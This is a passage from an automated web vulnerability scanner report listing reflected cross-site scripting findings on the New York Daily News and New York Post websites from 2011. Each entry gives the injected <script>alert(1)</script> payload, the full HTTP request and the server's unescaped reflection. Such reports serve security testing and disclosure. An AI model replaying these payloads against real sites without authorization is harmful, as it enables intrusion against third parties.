The value of the c0-methodName request parameter is copied into the HTML document as plain text between tags. The payload f8515<script>alert(1)</script>3d2fbbb82ca3fc7c9 was submitted in the c0-methodName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=3051AE2B8D71AA44AF807982E5BE96C8637&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesListsf8515<script>alert(1)</script>3d2fbbb82ca3fc7c9&c0-id=0&c0-param0=string:%2F&batchId=0 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Origin: http://www.nydailynews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Zvents=v8jp7ej93n; __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/index.html; zvents_tracker_sid=13171296713740.4048269435297698

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 286
Date: Tue, 27 Sep 2011 13:26:02 GMT
Age: 0
Via: AX-CACHE-2.4:20

//#DWR-INSERT
//#DWR-REPLY
dwr.engine._remoteHandleException('0','0',{cause:null,javaClassName:"java.lang.IllegalArgumentException",message:"Missing method or missing parameter converters: mostPopularStories.getMostPopularStoriesListsf8515<script>alert(1)</script>3d2fbbb82ca3fc7c9"});

2.265. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [c0-scriptName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr

Issue detail

The value of the c0-scriptName request parameter is copied into the HTML document as plain text between tags. The payload c6ddb<script>alert(1)</script>2ba9a70beb026715e was submitted in the c0-scriptName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=3051AE2B8D71AA44AF807982E5BE96C8637&c0-scriptName=mostPopularStoriesc6ddb<script>alert(1)</script>2ba9a70beb026715e&c0-methodName=getMostPopularStoriesLists&c0-id=0&c0-param0=string:%2F&batchId=0 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Origin: http://www.nydailynews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Zvents=v8jp7ej93n; __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/index.html; zvents_tracker_sid=13171296713740.4048269435297698

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/plain;charset=ISO-8859-1
Date: Tue, 27 Sep 2011 13:26:00 GMT
Age: 0
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Content-Length: 434

//#DWR-REPLY
if (window.dwr) dwr.engine._remoteHandleBatchException({ name:'java.lang.SecurityException', message:'No class by name: mostPopularStoriesc6ddb<script>alert(1)</script>2ba9a70beb026715e' }, '0');
else if (window.parent.dwr) window.parent.dwr.engine._remoteHandleBatchException({ name:'java.lang.SecurityException', message:'No class by name: mostPopularStoriesc6ddb<script>
...[SNIP]...

2.266. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [callCount parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr

Issue detail

The value of the callCount request parameter is copied into the HTML document as plain text between tags. The payload a70f4<script>alert(1)</script>4089ad78670d94534 was submitted in the callCount parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1a70f4<script>alert(1)</script>4089ad78670d94534&page=/index.html&httpSessionId=&scriptSessionId=3051AE2B8D71AA44AF807982E5BE96C8637&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesLists&c0-id=0&c0-param0=string:%2F&batchId=0 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Origin: http://www.nydailynews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Zvents=v8jp7ej93n; __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/index.html; zvents_tracker_sid=13171296713740.4048269435297698

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/plain;charset=ISO-8859-1
Date: Tue, 27 Sep 2011 13:25:59 GMT
Age: 0
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Content-Length: 472

//#DWR-REPLY
if (window.dwr) dwr.engine._remoteHandleBatchException({ name:'org.directwebremoting.extend.ServerException', message:'The specified call count is not a number: 1a70f4<script>alert(1)</script>4089ad78670d94534' });
else if (window.parent.dwr) window.parent.dwr.engine._remoteHandleBatchException({ name:'org.directwebremoting.extend.ServerException', message:'The specified call count is not a number: 1a70f4<
...[SNIP]...

2.267. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 60d74<script>alert(1)</script>540b9f1df96 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig60d74<script>alert(1)</script>540b9f1df96/WebPortal/nypost/images/favicon.ico HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.1.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 704
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:21:18 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig60d74<script>alert(1)</script>540b9f1df96/WebPortal/nypost/images/favicon.ico</p>
...[SNIP]...

2.268. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6c541<script>alert(1)</script>c8c0568a21e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal6c541<script>alert(1)</script>c8c0568a21e/nypost/images/favicon.ico HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.1.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 704
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:21:19 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal6c541<script>alert(1)</script>c8c0568a21e/nypost/images/favicon.ico</p>
...[SNIP]...

2.269. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/images/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c0d51<script>alert(1)</script>303a7c915b4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostc0d51<script>alert(1)</script>303a7c915b4/images/favicon.ico HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.1.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 704
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:21:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostc0d51<script>alert(1)</script>303a7c915b4/images/favicon.ico</p>
...[SNIP]...

2.270. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/images/favicon.ico

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d7f65<script>alert(1)</script>84e33f03760 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/imagesd7f65<script>alert(1)</script>84e33f03760/favicon.ico HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.1.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 704
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:21:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/imagesd7f65<script>alert(1)</script>84e33f03760/favicon.ico</p>
...[SNIP]...

2.271. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/images/favicon.ico

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a7ebe<script>alert(1)</script>9f2658b86ee was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/images/favicon.icoa7ebe<script>alert(1)</script>9f2658b86ee HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.1.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 704
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:21:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/images/favicon.icoa7ebe<script>alert(1)</script>9f2658b86ee</p>
...[SNIP]...

2.272. http://www.nypost.com/rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5a9eb<script>alert(1)</script>c690a5b695a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/nypost5a9eb<script>alert(1)</script>c690a5b695a/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/p/news/local/can_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __qca=P0-52444882-1317129796944; _chartbeat2=rdx0wt5nps41a8fh.1315773978848; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.3.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 720
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:23:33 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/nypost5a9eb<script>alert(1)</script>c690a5b695a/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg</p>
...[SNIP]...

2.273. http://www.nypost.com/rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8ec98<script>alert(1)</script>549b0cb838d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/nypost/20118ec98<script>alert(1)</script>549b0cb838d/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/p/news/local/can_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __qca=P0-52444882-1317129796944; _chartbeat2=rdx0wt5nps41a8fh.1315773978848; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.3.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 720
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:23:34 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/nypost/20118ec98<script>alert(1)</script>549b0cb838d/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg</p>
...[SNIP]...

2.274. http://www.nypost.com/rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ea652<script>alert(1)</script>f0b8bc16132 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/nypost/2011/09ea652<script>alert(1)</script>f0b8bc16132/27/news/web_photos/27n.006.dsk.C--300x300.jpg HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/p/news/local/can_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __qca=P0-52444882-1317129796944; _chartbeat2=rdx0wt5nps41a8fh.1315773978848; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.3.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 720
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:23:34 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/nypost/2011/09ea652<script>alert(1)</script>f0b8bc16132/27/news/web_photos/27n.006.dsk.C--300x300.jpg</p>
...[SNIP]...

2.275. http://www.nypost.com/rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6ca8a<script>alert(1)</script>b56d71ef0c2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/nypost/2011/09/276ca8a<script>alert(1)</script>b56d71ef0c2/news/web_photos/27n.006.dsk.C--300x300.jpg HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/p/news/local/can_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __qca=P0-52444882-1317129796944; _chartbeat2=rdx0wt5nps41a8fh.1315773978848; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.3.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 720
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:23:34 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/nypost/2011/09/276ca8a<script>alert(1)</script>b56d71ef0c2/news/web_photos/27n.006.dsk.C--300x300.jpg</p>
...[SNIP]...

2.276. http://www.nypost.com/rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3808c<script>alert(1)</script>dd4eebab7c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/nypost/2011/09/27/news3808c<script>alert(1)</script>dd4eebab7c/web_photos/27n.006.dsk.C--300x300.jpg HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/p/news/local/can_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __qca=P0-52444882-1317129796944; _chartbeat2=rdx0wt5nps41a8fh.1315773978848; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.3.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:23:35 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/nypost/2011/09/27/news3808c<script>alert(1)</script>dd4eebab7c/web_photos/27n.006.dsk.C--300x300.jpg</p>
...[SNIP]...

2.277. http://www.nypost.com/rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload dc90e<script>alert(1)</script>059c95f8cc2 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/nypost/2011/09/27/news/web_photosdc90e<script>alert(1)</script>059c95f8cc2/27n.006.dsk.C--300x300.jpg HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/p/news/local/can_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __qca=P0-52444882-1317129796944; _chartbeat2=rdx0wt5nps41a8fh.1315773978848; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.3.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 720
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:23:35 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/nypost/2011/09/27/news/web_photosdc90e<script>alert(1)</script>059c95f8cc2/27n.006.dsk.C--300x300.jpg</p>
...[SNIP]...

2.278. http://www.nypost.com/rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 40a67<script>alert(1)</script>a1bb405658e was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg40a67<script>alert(1)</script>a1bb405658e HTTP/1.1
Host: www.nypost.com
